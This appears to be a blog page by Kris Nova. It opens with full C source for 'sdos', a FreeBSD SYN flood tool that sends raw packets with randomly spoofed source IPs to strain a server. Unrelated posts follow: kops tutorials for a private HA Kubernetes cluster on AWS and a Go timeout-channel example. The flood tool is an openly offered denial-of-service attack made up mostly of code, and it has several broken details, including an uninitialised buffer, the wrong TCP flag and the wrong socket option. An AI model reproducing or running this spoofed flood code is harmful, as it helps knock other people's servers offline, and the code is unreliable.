Author: Kris Nova

I have been working on a SYN flood tool that stresses the TCP handshake, written against native FreeBSD C libraries.

The original project can be found here.

/*
 * ============================================================================
 *
 * (c)2002-2014. Kris Nova. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *=============================================================================
 *
 * sdos.c
 *
 * Tested and compiled on FreeBSD 10+
 *
 * A simple C program that attempts to flood a server with SYN requests in the
 * hope of determining its availability threshold.
 *
 * This is an isolated penetration test that will send requests via a unique
 * thread.
 *=============================================================================
 */

/* Includes */
#include <stdlib.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <string.h>
#include <sys/socket.h>
#include <errno.h>
#include <arpa/inet.h>
#include <time.h>

/* Interface */
int main(int argc, char *argv[]);
unsigned short csum(unsigned short *ptr, int nbytes);
void usage();
int flood();
char* randIp();

/**
 * configuration
 *
 * The basic information for defining where we will send the pen request
 */
struct configuration
{
	char *ip;
	char *message;
	int port;
	int verbose;
};

/**
 * main
 *
 * Handles argument parsing and building the configuration struct
 *
 * int argc     The total number of arguments passed
 * char *argv[] Array of arguments, space delimited
 */
int main(int argc, char *argv[])
{
	//Set defaults
	struct configuration cfg;
	cfg.ip = "127.0.0.1";
	cfg.port = 1234;
	cfg.message = "...";
	cfg.verbose = 0;

	//Define
	unsigned int seed;
	unsigned int ii;

	// Invalid command, display usage
	int i;
	if (argc <= 2)
	{
		usage();
		exit(0);
	}

	// Parse arguments
	for (i = 0; i < argc; i++)
	{
		if (argv[i][0] == '-')
		{
			switch (argv[i][1])
			{
			case 'v':
				//Verbose
				cfg.verbose = 1;
				break;
			case 'h':
				//Host
				cfg.ip = argv[i + 1];
				break;
			case 'p':
				//Port
				cfg.port = atoi(argv[i + 1]);
				break;
			case 'm':
				//Message
				cfg.message = argv[i + 1];
				break;
			}
		}
	}
	//Call flood with our configuration
	seed = time(NULL);
	ii = 0;
	while (flood(cfg))
	{
		seed++;
		ii++;
		srand(seed);
		printf("Iterations: %i\n", ii);
	}
	//Fin
	return 1;
}

/**
 * csum
 *
 * Calculates the standard Internet (one's complement) checksum over a buffer
 */
unsigned short csum(unsigned short *ptr, int nbytes)
{
	register long sum;
	unsigned short oddbyte;
	register short answer;
	sum = 0;
	while (nbytes > 1)
	{
		sum += *ptr++;
		nbytes -= 2;
	}
	if (nbytes == 1)
	{
		oddbyte = 0;
		*((u_char*) &oddbyte) = *(u_char*) ptr;
		sum += oddbyte;
	}
	sum = (sum >> 16) + (sum & 0xffff);
	sum = sum + (sum >> 16);
	answer = (short) ~sum;
	return (answer);
}

/**
 * flood
 *
 * The main function for the test
 * Handles sending the packets to the server in test
 */
int flood(struct configuration *cfg)
{
	//Create a raw socket
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
	//Datagram to represent the packet
	char datagram[4096], source_ip[32];
	//IP header
	struct ip *iph = (struct ip *) datagram;
	//TCP header
	struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof(struct ip));
	//Socket
	struct sockaddr_in sin;
	//Spoof struct (for calculating the checksum)
	struct ippseudo ipps;

	sin.sin_family = AF_INET;
	sin.sin_port = htons(80);
	//TODO random IP
	sin.sin_addr.s_addr = inet_addr(randIp());

	//Zero out the buffer
	memset(datagram, 0, 4096);

	//IP header
	iph->ip_hl = 5;
	iph->ip_v = 4;
	iph->ip_tos = 0;
	iph->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
	iph->ip_id = htons(54321);
	iph->ip_off = 0;
	iph->ip_ttl = 255;
	iph->ip_p = IPPROTO_TCP;
	iph->ip_sum = 0;
	struct in_addr ipsrc;
	ipsrc.s_addr = inet_addr(source_ip);
	iph->ip_src = ipsrc;
	struct in_addr ipdst;
	ipdst.s_addr = sin.sin_addr.s_addr;
	iph->ip_dst = ipdst;
	iph->ip_sum = csum((unsigned short *) datagram, iph->ip_len >> 1);

	//TCP Header
	tcph->th_sport = htons(1234);
	tcph->th_dport = htons(80);
	tcph->th_seq = 0;
	tcph->th_ack = 0;
	//First and only TCP segment
	tcph->th_off = 5;
	tcph->th_flags = 00000010;
	//Max window size
	tcph->th_win = htons(5840);
	//The kernel will handle calculating this
	tcph->th_sum = 0;
	tcph->th_urp = 0;

	//Spoof struct
	struct in_addr spfsrc;
	spfsrc.s_addr = inet_addr(source_ip);
	ipps.ippseudo_src = spfsrc;
	struct in_addr spfdst;
	spfdst.s_addr = sin.sin_addr.s_addr;
	ipps.ippseudo_dst = spfdst;
	ipps.ippseudo_pad = 0;
	ipps.ippseudo_p = IPPROTO_TCP;
	ipps.ippseudo_len = htons(20);

	//Calculate checksum for the TCP header
	tcph->th_sum = csum((unsigned short*) &ipps, sizeof(struct ippseudo));

	//IP_HDRINCL to tell the kernel that headers are included in the packet
	int one = 1;
	const int *val = &one;
	if (setsockopt(s, IPPROTO_IP, PF_INET, val, sizeof(one)) < 0)
	{
		printf("Error setting IP_HDRINCL. "
				"Error number : %d . "
				"Error message : %s \n",
		errno, strerror(errno));
		exit(0);
	}

	//Send the packet
	if (sendto(s, /* our socket */
	datagram, /* the buffer containing headers and data */
	iph->ip_len, /* total length of our datagram */
	0, /* routing flags, normally always 0 */
	(struct sockaddr *) &sin, /* socket addr, just like in */
	sizeof(sin)) < 0) /* a normal send() */
	{
		printf("Packet transmission failed!\n");
		return 1;
	}
	//Data sent successfully
	else
	{
		printf("Packet transmission success!\n");
		return 1;
	}
}

/**
 * randIp
 *
 * Will generate a random IP address to spoof the packet with
 */
char* randIp()
{
	char *ip;
	sprintf(ip,
			"%d.%d.%d.%d",
			rand() & 126,
			rand() & 255,
			rand() & 255,
			rand() & 255);
	printf("Random IP: %s\n", ip);
	return ip;
}

/**
 * usage
 *
 * How do we run this thing
 */
void usage()
{
	printf("./sdos <options>\n");
	printf("\n");
	printf("v     Verbose - Enables verbosity\n");
	printf("h     Host    - IP of host to connect to\n");
	printf("p     Port    - The numerical port to connect on\n");
	printf("m     Message - Optional message to send to the server\n");
	printf("\n");

}

Today we announce the release of Kubernetes kops 1.5.1 LTS!

I figured what better way to announce the release than with an updated blog post on setting up an HA cluster on a private topology!

What we are building

In this tutorial we will cover setting up an HA, privately networked Kubernetes cluster in AWS with Kubernetes kops 1.5.1.

  • Fully managed VPC in AWS, with automatically generated private and public subnets.
  • Outbound traffic managed through a NAT gateway and elastic IP in each private subnet.
  • Classic ELB fronting the Kubernetes API on TCP 443 (No firewall holes for the cluster).
  • Classic ELB fronting a bastion ASG for resilient SSH access for admins.
  • HA (Highly Available) Kubernetes masters spread across multiple availability zones in an ASG.
  • Kubernetes nodes spread across multiple availability zones in an ASG.
  • Public DNS alias for the Kubernetes API.

Installing kops 1.5.1

Kubernetes kops is an open source tool from the Kubernetes project for deploying Kubernetes clusters in AWS. We will be using it throughout this tutorial.


curl -sSL https://github.com/kubernetes/kops/releases/download/1.5.1/kops-darwin-amd64 -O
chmod +x kops-darwin-amd64
sudo mv kops-darwin-amd64 /usr/local/bin/kops

More information on installing kops can be found here for our non-OS X users.

Installing kubectl

We will also be needing a tool called kubectl. Think of this as a thin CLI client for the Kubernetes API, similar to the aws CLI tool we will be installing next.

curl -O https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/darwin/amd64/kubectl
chmod +x kubectl
sudo mv kubectl /usr/local/bin

Setting up your AWS environment

Get your AWS credentials from the console

Use the AWS console to get an AWS AccessKeyId and AWS SecretAccessKey (see the official documentation). After you have your credentials, download the CLI tool and configure it with your new user. You can also use any method defined here.

brew update && brew install awscli
aws configure

We strongly recommend using a single user with a select few IAM permissions to run kops. Thankfully kops provides a handy IAM creation script that will create a new user with the correct permissions. Be sure to note your new AccessKeyId and SecretAccessKey for the next step.

curl -O https://raw.githubusercontent.com/kubernetes/kops/master/hack/new-iam-user.sh
sh new-iam-user.sh <group> <user>
aws iam list-users

Setting up DNS for your cluster

We will need a publicly resolvable domain name for our cluster, so we need to make sure we have a hosted zone set up in Route53. In this example we will be using nivenly.com for our example hosted zone.

 ID=$(uuidgen) && aws route53 create-hosted-zone --name nivenly.com --caller-reference $ID 

More information on advanced DNS setups is available in the kops documentation.

Setting up a state store for your cluster

Kops will store a representation of your Kubernetes cluster in AWS S3. This is called the kops state store. It is important to note that kops DOES NOT store any concept of what resources are deployed; that would create two sources of truth (the AWS API and the state store). Rather, kops merely stores a definition of the Kubernetes cluster, which is then applied to AWS by kops.

We will call our state store in this example nivenly-com-state-store.

 aws s3api create-bucket --bucket nivenly-com-state-store --region us-east-1 
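
Once kops has written a cluster definition (which we do below), you can always peek at what lives in the state store by listing the bucket. As a rough illustration, expect to see objects such as the cluster spec and instance group definitions under a prefix named after the cluster:

 aws s3 ls s3://nivenly-com-state-store --recursive 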

Creating your first cluster

Getting ready

Okay! We are ready to start creating our first cluster. Let's first set up a few environment variables to make this process as clean as possible.

export NAME=myfirstcluster.nivenly.com
export KOPS_STATE_STORE=s3://nivenly-com-state-store

Form your create cluster command

We will need to note which availability zones are available to us. These are different for every AWS account. In this example we will be deploying our cluster to the us-west-2 region.

 aws ec2 describe-availability-zones --region us-west-2 

Let's form our create cluster command. Here we want to define a few things.

  • --node-count 3
    • We want 3 Kubernetes nodes
  • --zones us-west-2a,us-west-2b,us-west-2c
    • We want to run our nodes spread across the 3 availability zones available to our account
    • This is a CSV list, pulled from the API in the previous request
  • --master-zones us-west-2a,us-west-2b,us-west-2c
    • This will tell kops to spread masters across those availability zones.
    • Because there is more than 1, this will automatically be run in HA.
  • --dns-zone nivenly.com
    • We define the DNS hosted zone we created earlier
  • --node-size t2.large
    • We set our nodes to a defined instance size
  • --master-size t2.large
    • We set our masters to a defined instance size
  • --topology private
    • We define that we want to use a private network topology with kops.
    • This is what tells kops to build the private architecture described above.
  • --networking calico
    • We tell kops to use Calico for our overlay network
    • Overlay networks are required for this configuration.
    • Many thanks to our friends at Calico for helping us get this into kops!
  • --bastion
    • Add this flag to tell kops to create a bastion server so you can SSH into the cluster

Kops will default to ~/.ssh/id_rsa.pub for backend access. You can override this with --ssh-public-key /path/to/key.pub

kops create cluster \
    --node-count 3 \
    --zones us-west-2a,us-west-2b,us-west-2c \
    --master-zones us-west-2a,us-west-2b,us-west-2c \
    --dns-zone nivenly.com \
    --node-size t2.large \
    --master-size t2.large \
    --topology private \
    --networking calico \
    --bastion \
    ${NAME}

kops will deploy these instances using AWS auto scaling groups, so each instance should be ephemeral and will rebuild itself if taken offline for any reason.

Cluster Configuration

We have now created the underlying cluster configuration. Let's take a look at every aspect that will define our cluster.

 kops edit cluster ${NAME} 

This will open up the cluster config (which is actually stored in the S3 bucket we created earlier!) in your favorite text editor. Here is where we can really tweak our cluster for our use case. In this tutorial, we leave it at its defaults for now.
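
As a rough idea of what to expect (heavily abbreviated, and the exact fields can vary between kops versions), the config is a YAML document along these lines:

apiVersion: kops/v1alpha2
kind: Cluster
metadata:
  name: myfirstcluster.nivenly.com
spec:
  cloudProvider: aws
  configBase: s3://nivenly-com-state-store/myfirstcluster.nivenly.com
  networking:
    calico: {}
  topology:
    masters: private
    nodes: private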

For more information on these directives and the kops API, please check out the official kops documentation.

Apply the changes

Okay, we are ready to create the cluster in AWS. We do so by running the following command.

 kops update cluster ${NAME} --yes 

Start using the cluster

The resources will be deployed asynchronously here. So even though kops has finished, that does not mean our cluster is built. A great way to check whether the cluster is online and the API is working is to use kubectl.

 kubectl get nodes 

After we verify the API is responding, we can now use the Kubernetes cluster.

Backend SSH access

We should also now have a bastion server behind an elastic load balancer in AWS that will give us access to the cluster over SSH. Grab the bastion ELB A record and the private IP of the instance you want to access from the AWS console, then SSH into the bastion as follows.

 
ssh-add ~/.ssh/id_rsa
ssh -A admin@bastion.myfirstcluster.nivenly.com
ssh admin@<master_private_ip>


This post is DEPRECATED

Please check out the most recent article instead.

What we are building

In this tutorial we will cover setting up an HA, privately networked Kubernetes cluster in AWS with Kubernetes kops.

  • Fully private VPC, housing utility and private subnets, with hybrid cloud capabilities over VPN
  • HA (Highly Available) masters spread across availability zones with private subnetting
  • Nodes spread across availability zones with private subnetting
  • Routing between subnets with NAT gateways
  • Elastic Load Balancers in front of the resources for public access
  • Bastion server for backend SSH access to the instances

Installing kops

Kubernetes kops is an open source tool from the Kubernetes project for deploying Kubernetes clusters against different cloud providers. We will be using it to do the heavy lifting in this tutorial.

Start by installing the most recent version of kops from the master branch.


brew update && brew install --HEAD kops

More information on installing kops can be found here for our non OS X users.

Installing kubectl

We will also be needing a tool called kubectl. Think of this as a thin CLI client for the Kubernetes API, similar to the aws CLI tool we will be installing next.

You can download the tarball from the Kubernetes latest release page on GitHub, or follow the official install guide here.

wget https://github.com/kubernetes/kubernetes/releases/download/v1.4.6/kubernetes.tar.gz
tar -xzf kubernetes.tar.gz
sudo cp kubernetes/platforms/darwin/amd64/kubectl /usr/local/bin/kubectl

Setting up your AWS environment

Setting up a kops IAM user

In this example we will be using a dedicated IAM user to use with kops. This user will need basic API security credentials in order to use kops. Create the user and credentials using the AWS console. More information.

Kubernetes kops uses the official AWS Go SDK, so all we need to do here is set up your system to use the official AWS supported methods of registering security credentials defined here. Here is an example using the aws command line tool to set up your security credentials.

brew update && brew install awscli
aws configure
aws iam list-users

We should now be able to pull a list of IAM users from the API, verifying that our credentials are working as expected.

Setting up DNS for your cluster

We will need a publicly resolvable domain name for our cluster, so we need to make sure we have a hosted zone set up in Route53. In this example we will be using nivenly.com for our example hosted zone.

 ID=$(uuidgen) && aws route53 create-hosted-zone --name nivenly.com --caller-reference $ID 

Setting up a state store for your cluster

In this example we will be creating a dedicated S3 bucket for kops to use. This is where kops will store the representation of your cluster, and it serves as the source of truth for our cluster configuration throughout the process. We will call this bucket nivenly-com-state-store. I recommend keeping the bucket in us-east-1; otherwise you will also need to pass a location constraint to the create-bucket call.

 aws s3api create-bucket --bucket nivenly-com-state-store --region us-east-1 

Creating your first cluster

Setup your environment for kops

Okay! We are ready to start creating our first cluster. Let's first set up a few environment variables to make this process as clean as possible.

export NAME=myfirstcluster.nivenly.com
export KOPS_STATE_STORE=s3://nivenly-com-state-store

Note: You don't have to use environment variables here. You can always define the values using the --name and --state flags later.
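
For example (purely as an illustration of those flags), the update step we run later could equally be written as:

 kops update cluster --name myfirstcluster.nivenly.com --state s3://nivenly-com-state-store --yes 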

Form your create cluster command

We will need to note which availability zones are available to us. In this example we will be deploying our cluster to the us-west-2 region.

 aws ec2 describe-availability-zones --region us-west-2 

Let's form our create cluster command. Here we want to define a few things.

  • --node-count 3
    • We want 3 Kubernetes nodes
  • --zones us-west-2a,us-west-2b,us-west-2c
    • We want to run our nodes spread across the 3 availability zones available to our account
    • This is a CSV list, pulled from the API in the previous request
  • --master-zones us-west-2a,us-west-2b,us-west-2c
    • This will tell kops that we want 3 masters, running in HA in these 3 availability zones
  • --dns-zone nivenly.com
    • We define the DNS hosted zone we created earlier
  • --node-size t2.medium
    • We set our nodes to a defined instance size
  • --master-size t2.medium
    • We set our masters to a defined instance size
  • --topology private
    • We define that we want to use a private network topology with kops
  • --networking weave
    • We tell kops to use Weave for our overlay network
    • Many thanks to our friends at Weave for helping us make this a staple part of our clusters!
  • --image 293135079892/k8s-1.4-debian-jessie-amd64-hvm-ebs-2016-11-16
    • This is required as a temporary workaround until kops 1.4.2 is released (Estimated Dec 17, 2016)

Kops will default to ~/.ssh/id_rsa.pub for backend access. You can override this with --ssh-public-key /path/to/key.pub

kops create cluster \
    --node-count 3 \
    --zones us-west-2a,us-west-2b,us-west-2c \
    --master-zones us-west-2a,us-west-2b,us-west-2c \
    --dns-zone nivenly.com \
    --node-size t2.medium \
    --master-size t2.medium \
    --topology private \
    --networking weave \
    --image 293135079892/k8s-1.4-debian-jessie-amd64-hvm-ebs-2016-11-16 \
    ${NAME}

kops will deploy these instances using AWS auto scaling groups, so each instance should be ephemeral and will rebuild itself if taken offline for any reason.

Cluster Configuration

We have now created the underlying cluster configuration. Let's take a look at every aspect that will define our cluster.

 kops edit cluster ${NAME} 

This will open up the cluster config (which is actually stored in the S3 bucket we created earlier!) in your favorite text editor. Here is where we can really tweak our cluster for our use case. In this tutorial, we leave it at its defaults for now.

For more information on these directives and the kops API, please check out the official kops documentation.

Apply the changes

Okay, we are ready to create the cluster in AWS. We do so by running the following command.

 kops update cluster ${NAME} --yes 

Start using the cluster

The resources will be deployed asynchronously here. So even though kops has finished, that does not mean our cluster is built. A great way to check whether the cluster is online and the API is working is to use kubectl.

 kubectl get nodes 

After we verify the API is responding, we can now use the Kubernetes cluster.

Backend SSH access

We should also now have a bastion server behind an elastic load balancer in AWS that will give us access to the cluster over SSH. Grab the bastion ELB A record and the private IP of the instance you want to access from the AWS console, then SSH into the bastion as follows.

 
ssh -A admin@<bastion_elb_a_record>
ssh admin@<instance_private_ip>

What do you think?

I always love comments and suggestions on how to be better. Let me know your thoughts if you have any good ones.

I wrote a lot of the code for the features in this article, so feel free to hit me up on GitHub if you want to follow along!


Suppose you want to execute a function and you expect it to complete within a predefined amount of time.

Maybe you just don’t care about the result if you can’t get it quickly.

Timeout patterns in Go are very useful if you want to fail quickly, particularly in web programming or socket programming.

The idea behind a timeout is handy, but a pain to code over and over. Here is a clever example of a concurrent timeout implementation, as well as an example of channel factories.

Timeout

Timeouts are the idea that the code should move forward after an arbitrarily defined amount of time if another task has not completed.
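
As a point of reference, Go's standard library already provides a ready-made timeout channel: time.After returns a channel that fires once the given duration has elapsed, so a select statement can race real work against it. Here is a minimal sketch of that pattern (the worker goroutine is just a stand-in):

package main

import (
	"fmt"
	"time"
)

func main() {
	work := make(chan string)
	// Stand-in for a real task that may or may not finish quickly
	go func() {
		time.Sleep(3 * time.Second)
		work <- "done"
	}()

	select {
	case result := <-work:
		fmt.Println("work finished:", result)
	case <-time.After(2 * time.Second):
		// The deadline fired first; move on without the result
		fmt.Println("timed out, moving on")
	}
}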

Concurrent Factories

Concurrent factories are ways of generating channels in Go that look and feel the same but can have different implementations.

In the case of the code below, the getTimeoutChannel function behaves as a concurrent factory.


package main

import (
	"time"
	"fmt"
)

// Will call the getTimeoutChannel factory function, passing in different sleep times for each channel
func main() {
	ch_a := getTimeoutChannel(1) // 1 sec
	ch_b := getTimeoutChannel(2) // 2 sec
	ch_c := getTimeoutChannel(5) // 5 sec
	// select blocks until one of the channels has a value ready
	select {
	case <-ch_a:
		fmt.Println("Channel A")
	case <-ch_b:
		fmt.Println("Channel B")
	case <-ch_c:
		fmt.Println("Channel C")
	}
}

// Will generate a new channel, and concurrently run a sleep based on the input
// Will return true after the sleep is over
func getTimeoutChannel(N int) chan bool {
	ch := make(chan bool)
	go func() {
		time.Sleep(time.Second * time.Duration(N))
		ch <- true
	}()
	return ch
}


What happened?

We started 3 concurrent timeout factories, each with a unique channel. Each of the channels will time out and return a value after the defined sleep. In this example ch_a will obviously time out first, as it only sleeps for 1 second.

The select statement will block until one of the 3 channels returns a value. After the select statement receives a value from a channel, it performs the logic for the corresponding case. This allows us to easily pick and choose which avenue the code should progress with.

When is this useful?

Imagine if ch_a and ch_b were not timeout channels but rather actual logic in your program. Imagine if ch_a was actually a read from a cache, and ch_b was actually a read from a database.

Let's say the 2 second timeout was actually a 2 second cache read. The program shouldn't really care whether the cache read is successful or not. If it is taking 2 seconds, it is hardly doing its job as a quick cache anyway. So the program should be smart enough to use whatever value is returned first, not whatever value should be returned first. In this case, the database read.

Now we are in a situation where we implemented a cache, and for whatever reason the cache doesn’t seem to want to return a value. Perhaps updating the cache would be in order?

We can take our example one step further and keep the 5 second timeout on ch_c. For the sake of our experimental program, 5 seconds should be more than enough time for any of the supported avenues to return a meaningful value. If, after the 5 seconds have elapsed, the first two channels haven't reported any valuable data, we should consider the system to be in a state of catastrophic failure and report back accordingly. Simply add the failure path to the program, and rest assured that the program will handle even the most unexpected of edge cases quickly and meaningfully.
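
Here is a minimal sketch of that idea. The cache and database readers are just stand-ins (the names and timings are invented for illustration), and time.After supplies the 5 second failure path:

package main

import (
	"fmt"
	"time"
)

// readCache simulates an unusually slow cache read (2 seconds)
func readCache() chan string {
	ch := make(chan string)
	go func() {
		time.Sleep(2 * time.Second)
		ch <- "value from cache"
	}()
	return ch
}

// readDatabase simulates a database read that answers in 1 second
func readDatabase() chan string {
	ch := make(chan string)
	go func() {
		time.Sleep(1 * time.Second)
		ch <- "value from database"
	}()
	return ch
}

func main() {
	cache := readCache()
	db := readDatabase()
	select {
	case v := <-cache:
		fmt.Println("cache answered first:", v)
	case v := <-db:
		fmt.Println("database answered first:", v)
	case <-time.After(5 * time.Second):
		fmt.Println("catastrophic failure: nothing answered in time")
	}
}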

Now, doesn’t that seem like a great way to structure a program?

Hi. I am Kris Nova. I am a twenty-something-year-old software engineer with an unhealthy passion for blogging and contributing to open source software. I like to write.

I hope you find my work interesting and share your thoughts on them.
